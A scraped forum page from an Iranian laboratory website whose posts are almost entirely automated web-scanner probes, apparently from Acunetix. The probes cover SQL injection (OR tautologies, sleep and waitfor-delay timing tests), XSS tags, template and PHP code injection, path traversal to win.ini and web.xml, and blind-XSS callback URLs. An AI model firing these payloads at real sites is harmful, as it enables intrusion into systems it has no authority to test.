صفحه اصلی گالری فرم استخدام نظرسنجی اخبار تالار گفتگو تماس با ما درباره ما
امروز : شنبه ، 5 آذر 1401        ساعت :
ورود به سیستم جوابدهی آنلاین
 


نام کاربری :
رمز ورود :
جستجوی آزمایشاتتالار گفتگو

شما عزیزان می توانید سؤالات علمی و عمومی خود را پیرامون مسائل آزمایشگاهی با متخصصین این مرکز مطرح نمایید و پاسخ خود را در همین صفحه دریافت کنید.نوشتن شماره همراه ضروری است؛ تا در صورت لزوم امکان تماس با شما از طرف متخصصین مرکز وجود داشته باشد. لازم بذکر است شماره تماس شما بر روی وب سایت قابل رؤیت نمی باشد.1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.<%div style=width:expression(msC7(9194))>
20
1
Mr.<ScRiPt>msC7(9478)</sCripT>
20
1
Mr.\u003CScRiPt\msC7(9224)\u003C/sCripT\u003E
20
1
%4D%72%2E%3C%53%63%52%69%50%74%20%3E%6D%73%43%37%289533%29%3C%2F%73%43%72%69%70%54%3E
20
1
{{9999772*9999991}}
20
1
CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g� ]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
20
1
acux2204��z1��z2a�bcxuca2204
20
1
acu3300<s1﹥s2ʺs3ʹuca3300
20
1
Mr.9645967
20
1
Mr.
20
1<%div style=width:expression(msC7(9997))>
Mr.
20
1<ScRiPt>msC7(9789)</sCripT>
Mr.
20
1\u003CScRiPt\msC7(9577)\u003C/sCripT\u003E
Mr.
20
%31%3C%53%63%52%69%50%74%20%3E%6D%73%43%37%289830%
Mr.
20
{{10000198*9999131}}
Mr.
20
CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F� G&َ7�
Mr.
20
acux5582��z1��z2a�bcxuca5582
Mr.
20
acu8691<s1﹥s2ʺs3ʹuca8691
Mr.
20
19838422
Mr.
20
1
Mr.
20
1
Mr.
20<%div style=width:expression(msC7(9863))>
1
Mr.
20<ScRiPt>msC7(9103)</sCripT>
1
Mr.
20\u003CScRiPt\msC7(9924)\u003C/sCripT\u003E
1
Mr.
20
1
Mr.
%32%30%3C%53%63%52%69%50%74%20%3E%6D%73%43%37%289129%29%3C%2F%73%43%72%69%70%54%3E
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
1'"
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g� ]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
1'"
20
1
Mr.
20
1
Mr.
CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g� ]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
1
Mr.
20
1
1'"
20
1
1'"
20
1
Mr.
20
1
Mr.
20
1
Mr.
{{9999191*10000304}}
1
Mr.
CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g� ]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
1
Mr.
acux3122��z1��z2a�bcxuca3122
1
Mr.
20
1
Mr.
20
1
Mr.
CWS000x�=�1N�@E߮��I)�@�� �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g� ]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0
1
Mr.
20
1
Mr.
acu7575<s1﹥s2ʺs3ʹuca7575
1
Mr.
20
�''�""
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
acux3122��z1��z2a�bcxuca3122
1
Mr.
20
1
Mr.
acux3122��z1��z2a�bcxuca3122
1
Mr.
20
1
-1' OR 2+301-301-1=0+0+0+1 or 'AMHowhHn'='
20
1
Mr.
20
1
883'
20
1
Mr.
acux3122��z1��z2a�bcxuca3122
�''�""
Mr.
20
1
Mr.
acu7575<s1﹥s2ʺs3ʹuca7575
1
-1" OR 2+302-302-1=0+0+0+1 --
20
�''�""
Mr.
20
1
-1' OR 2+301-301-1=0+0+0+1 or 'AMHowhHn'='
20
�''�""
Mr.
20
1
-1' OR 2+301-301-1=0+0+0+1 or 'AMHowhHn'='
20
1
Mr.
1'"
1
-1' OR 2+301-301-1=0+0+0+1 or 'AMHowhHn'='
20
1
Mr.
acu7575<s1﹥s2ʺs3ʹuca7575
1
-1' OR 2+314-314-1=0+0+0+1 --
20
1
Mr.
acu7575<s1﹥s2ʺs3ʹuca7575
JyI=
Mr.
20
�'�"
Mr.
20
1
-1' OR 2+314-314-1=0+0+0+1 --
20
JyI=
Mr.
20
1
Mr.
209847069
1
-1' OR 2+314-314-1=0+0+0+1 --
20
1
Mr.
209847069
@@s65YJ
Mr.
20
1����%2527%2522
Mr.
20
\
Mr.
20
1'"
Mr.
20
1
-1' OR 2+314-314-1=0+0+0+1 --
20
1
Mr.
1'"
1
Mr.
20
1
Mr.
20
1
-1 OR 2+465-465-1=0+0+0+1
20
1
-1 OR 2+364-364-1=0+0+0+1 --
20
1
eS1lZlAy
20
1
eS1lZlAy
20
1
Mr.
1'"
1
Mr.
20
1
Mr.
20
1
eS1lZlAy
20
1
Mr.
1'"
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
'"
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
'"
Mr.
20
1
Mr.
20
'"
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
'"
Mr.
20
1
Mr.
20
-1 OR 2+220-220-1=0+0+0+1
Mr.
20
388'
Mr.
20
1
Mr.
20
'"
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
'"
1
Mr.
20
388'
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
'"
1
Mr.
20
1
Mr.
'"
1
Mr.
20
-1" OR 2+813-813-1=0+0+0+1 --
Mr.
20
-1' OR 2+806-806-1=0+0+0+1 or 'jdB0YmRW'='
Mr.
20
-1' OR 2+790-790-1=0+0+0+1 --
Mr.
20
-1 OR 2+220-220-1=0+0+0+1
Mr.
20
1
Mr.
20
-1 OR 2+220-220-1=0+0+0+1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
-1 OR 2+220-220-1=0+0+0+1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
-1 OR 2+171-171-1=0+0+0+1 --
Mr.
20
1
Mr.
20
-1 OR 2+171-171-1=0+0+0+1 --
Mr.
20
1
/www.vulnweb.com
20
1
Mr.
20
-1 OR 2+171-171-1=0+0+0+1 --
Mr.
20
1
Mr.
20
1
Mr.
20
/www.vulnweb.com
Mr.
20
-1 OR 2+171-171-1=0+0+0+1 --
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
/www.vulnweb.com
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
euIn05oo
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
RESl7SLv'));select pg_sleep(0); --
1
Mr.
20
))))))))))))))))))))))))))))))))))))))))))))))))))
Mr.
20
1
Mr.
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
Mr.
20
1
Mr.
20
1
Mr.
gNVxixdt'));select pg_sleep(7); --
1
Mr.
20
1
Mr.
20
1
Mr.
YKE3mJGp'));select pg_sleep(22); --
1
http://hitiGcm1YrF1L.bxss.me/
20
1
http://hitiGcm1YrF1L.bxss.me/
20
1
Mr.
20
1
http://hitiGcm1YrF1L.bxss.me/
20
1
Mr.
20
1
Mr.
Daw6BzlP');select pg_sleep(22); --
1
Mr.
20
1
http://hitiGcm1YrF1L.bxss.me/
20
1
Mr.
5Icj71US';select pg_sleep(22); --
1
Mr.
-1));select pg_sleep(0); --
1
Mr.
20
1
Mr.
-1));select pg_sleep(22); --
1
Mr.
20
1
Mr.
20
1
Mr.
-1);select pg_sleep(15); --
1
Mr.
-1;select pg_sleep(0); --
http://hite4XL1ddxJI.bxss.me/
Mr.
20
http://hite4XL1ddxJI.bxss.me/
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
-1;select pg_sleep(15); --
1
Mr.
20
1
PagesFroum.aspx/.
20
1
Mr.
http://hitanCP1rR5q9.bxss.me/
1
PagesFroum.aspx/.
20
1
Mr.
20
1
Mr.
20
1
PagesFroum.aspx
20
1
Mr.
20
1
PagesFroum.aspx
20
1
PagesFroum.aspx
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
PagesFroum.aspx/.
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
tLqJFCAx')); waitfor delay '0:0:0' --
1
Mr.
OUHZB12I')); waitfor delay '0:0:15' --
1
Mr.
8jQZmwDB'); waitfor delay '0:0:0' --
1
Mr.
20
1
testasp.vulnweb.com/t/xss.html?%00
20
1
Mr.
WmTg8hcq'); waitfor delay '0:0:22' --
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
PagesFroum.aspx/.
Mr.
20
1
Mr.
20
1
testasp.vulnweb.com/t/xss.html?%00
20
1
Mr.
WaUiY8yY'); waitfor delay '0:0:7' --
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
lHtmP5EB'; waitfor delay '0:0:0' --
PagesFroum.aspx
Mr.
20
PagesFroum.aspx
Mr.
20
1
Mr.
20
1
HttP://testasp.vulnweb.com/t/xss.html?%00
20
1
HttP://testasp.vulnweb.com/t/xss.html?%00
20
1
Mr.
S4N9ki3A'; waitfor delay '0:0:22' --
1
Mr.
20
PagesFroum.aspx
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
PagesFroum.aspx
1
Mr.
liYzEmvk'; waitfor delay '0:0:15' --
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
';print(md5(acunetix_wvs_security_test));$a='
20
1
Mr.
PagesFroum.aspx/.
1
Mr.
PagesFroum.aspx
1
';print(md5(acunetix_wvs_security_test));$a='
20
1
Mr.
PagesFroum.aspx
1
Mr.
6LrDSkHw'; waitfor delay '0:0:7' --
1
Mr.
PagesFroum.aspx
1
Mr.
PagesFroum.aspx
1
Mr.
20
1
Mr.
20
1
';print(md5(acunetix_wvs_security_test));$a='
20
1
Mr.
20
1
';print(md5(acunetix_wvs_security_test));$a='
20
testasp.vulnweb.com/t/xss.html?%00
Mr.
20
1
Mr.
20
testasp.vulnweb.com/t/xss.html?%00
Mr.
20
testasp.vulnweb.com/t/xss.html?%00
Mr.
20
1
Mr.
20
testasp.vulnweb.com/t/xss.html?%00
Mr.
20
HttP://testasp.vulnweb.com/t/xss.html?%00
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
1 waitfor delay '0:0:0' --
${@print(md5(acunetix_wvs_security_test))}
Mr.
20
1
Mr.
1 waitfor delay '0:0:7' --
1
Mr.
20
1
;print(md5(acunetix_wvs_security_test));
20
1
Mr.
20
1
Mr.
20
HttP://testasp.vulnweb.com/t/xss.html?%00
Mr.
20
1
Mr.
20
HttP://testasp.vulnweb.com/t/xss.html?%00
Mr.
20
1
Mr.
HttP://testasp.vulnweb.com/t/xss.html?%00
1
Mr.
20
1
Mr.
HttP://testasp.vulnweb.com/t/xss.html?%00
${@print(md5(acunetix_wvs_security_test))}
Mr.
20
1
Mr.
HttP://testasp.vulnweb.com/t/xss.html?%00
1
Mr.
20
1
Mr.
HttP://testasp.vulnweb.com/t/xss.html?%00
1
Mr.
20
${@print(md5(acunetix_wvs_security_test))}
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
${@print(md5(acunetix_wvs_security_test))}
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
";print(md5(acunetix_wvs_security_test));$a="
Mr.
20
1
Mr.
-1)); waitfor delay '0:0:0' --
";print(md5(acunetix_wvs_security_test));$a="
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
";print(md5(acunetix_wvs_security_test));$a="
Mr.
20
";print(md5(acunetix_wvs_security_test));$a="
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
;print(md5(acunetix_wvs_security_test));
Mr.
20
';print(md5(acunetix_wvs_security_test));$a='
Mr.
20
;print(md5(acunetix_wvs_security_test));
Mr.
20
1
Mr.
;print(md5(acunetix_wvs_security_test));
1
Mr.
20
1
Mr.
20
1
Mr.
;print(md5(acunetix_wvs_security_test));
1
Mr.
-1)); waitfor delay '0:0:15' --
1
Mr.
;print(md5(acunetix_wvs_security_test));
1
Mr.
;print(md5(acunetix_wvs_security_test));
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
-1)); waitfor delay '0:0:7' --
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
-1)); waitfor delay '0:0:22' --
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
^(#$!@#$)(()))******
20
1
Mr.
-1); waitfor delay '0:0:22' --
1
Mr.
-1; waitfor delay '0:0:22' --
1
Mr.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
!(()&&!|*|*|
20
1
)
20
1
Mr.
(select(0)from(select(sleep(22)))v)/*'+(select(0)from(select(sleep(22)))v)+'"+(select(0)from(select(sleep(22)))v)+"*/
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
^(#$!@#$)(()))******
Mr.
20
!(()&&!|*|*|
Mr.
20
1
Mr.
0"XOR(if(now()=sysdate(),sleep(22),0))XOR"Z
1
Mr.
0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z
1
Mr.
0'XOR(if(now()=sysdate(),sleep(22),0))XOR'Z
1
Mr.
^(#$!@#$)(()))******
1
Mr.
20
)
Mr.
20
1
WEB-INF/web.xml
20
1
Mr.
20
1
Mr.
^(#$!@#$)(()))******
1
Mr.
^(#$!@#$)(()))******
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
-1" OR 2+19-19-1=0+0+0+1 --
1
Mr.
-1" OR 2+19-19-1=0+0+0+1 --
1
Mr.
20
1
Mr.
if(now()=sysdate(),sleep(15),0)
1
Mr.
-1" OR 2+19-19-1=0+0+0+1 --
1
Mr.
20
1
Mr.
20
1
Mr.
!(()&&!|*|*|
1
Mr.
-1' OR 2+689-689-1=0+0+0+1 or 'kss6KHwh'='
1
Mr.
!(()&&!|*|*|
1
Mr.
)
1
Mr.
-1' OR 2+689-689-1=0+0+0+1 or 'kss6KHwh'='
1
Mr.
)
1
Mr.
20
1
Mr.
-1' OR 2+689-689-1=0+0+0+1 or 'kss6KHwh'='
1
Mr.
)
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
WEB-INF\web.xml
20
1
Mr.
-1' OR 2+689-689-1=0+0+0+1 or 'kss6KHwh'='
1
Mr.
20
1
Mr.
20
1
WEB-INF/web.xml
20
1
Mr.
20
1
'"()
20
1
Mr.
20
1
Mr.
20
1
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
20
1
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
20
1
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
20
1
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
20
1
Mr.
20
1
..\..\..\..\..\..\..\..\windows\win.ini
20
1
Mr.
-1 OR 2+277-277-1=0+0+0+1
1
Mr.
-1' OR 2+911-911-1=0+0+0+1 --
1
Mr.
20
1
................windowswin.ini
20
1
������������������������������������������������windows��win.ini
20
1
../../../../../../../../../../windows/win.ini.
20
1
C:\WINDOWS\system32\drivers\etc\hosts
20
1
Mr.
20
1
Mr.
-1 OR 2+277-277-1=0+0+0+1
1
../../../../../../../../../../windows/win.ini
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
'"()
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
-1 OR 2+277-277-1=0+0+0+1
1
Mr.
20
1
Mr.
20
1
Mr.
'"()
1
Mr.
-1 OR 2+277-277-1=0+0+0+1
1
Mr.
20
1
Mr.
20
1
Mr.
-1 OR 2+160-160-1=0+0+0+1 --
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
-1 OR 2+160-160-1=0+0+0+1 --
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
-1 OR 2+160-160-1=0+0+0+1 --
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
Jn5oIink
1
Mr.
20
1
Mr.
Jn5oIink
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
testasp.vulnweb.com
20
1
http://testasp.vulnweb.com/t/fit.txt?.
20
1
Mr.
20
1
Http://testasp.vulnweb.com/t/fit.txt
20
1
1some_inexistent_file_with_long_name.
20
1
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.
20
1
Mr.
20
1
Mr.
20
WEB-INF\web.xml
Mr.
20
WEB-INF/web.xml
Mr.
20
unexisting/../../../../../../../../../../windows/w
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
../.../.././../.../.././../.../.././../.../.././..
Mr.
20
../..//../..//../..//../..//../..//../..//../..//.
Mr.
20
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
Mr.
20
1
Mr.
20
..\..\..\..\..\..\..\..\windows\win.ini
Mr.
20
1
Mr.
20
................windowswin.ini
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
������������������������������������������������wi
Mr.
20
../../../../../../../../../../windows/win.ini.jpg
Mr.
20
C:\WINDOWS\system32\drivers\etc\hosts
Mr.
20
../../../../../../../../../../windows/win.ini
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.&n909260=v908511
20
1
Mr.
WEB-INF\web.xml
1
Mr.
20
1
Mr.
20
1
Mr.
20
testasp.vulnweb.com
Mr.
20
http://testasp.vulnweb.com/t/fit.txt?.jpg
Mr.
20
Http://testasp.vulnweb.com/t/fit.txt
Mr.
20
1some_inexistent_file_with_long_name.jpg
Mr.
20
http://some-inexistent-website.acu/some_inexistent
Mr.
20
1
Mr.
testasp.vulnweb.com
1
Mr.
http://testasp.vulnweb.com/t/fit.txt?.jpg
1
Mr.
20
1
Mr.
Http://testasp.vulnweb.com/t/fit.txt
1
Mr.
WEB-INF/web.xml
1
Mr.
20
1
Mr.
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
1
Mr.
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
1
Mr.
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
1
Mr.
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
1
Mr.
1some_inexistent_file_with_long_name.jpg
1
Mr.
..\..\..\..\..\..\..\..\windows\win.ini
1
Mr.
20
1
Mr.
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1
Mr.
20
1
Mr.
20
1
Mr.
................windowswin.ini
1&n934460=v906263
Mr.
20
1
Mr.
20
1
Mr.
������������������������������������������������windows��win.ini
1
Mr.
../../../../../../../../../../windows/win.ini.jpg
1
Mr.
20&n996654=v922673
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
C:\WINDOWS\system32\drivers\etc\hosts
1
Mr.
../../../../../../../../../../windows/win.ini
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
12345'"\'\");|]*{ <>�''💩
20
1
${10000461+10000005}
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
${10000114+10000390}
Mr.
20
1
Mr.
20
1
Mr.
${10000409+9999333}
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
12345'"\'\");|]*{ <>�''💩
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
12345'"\'\");|]*{ <>�''💩
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
1
Mr.
20
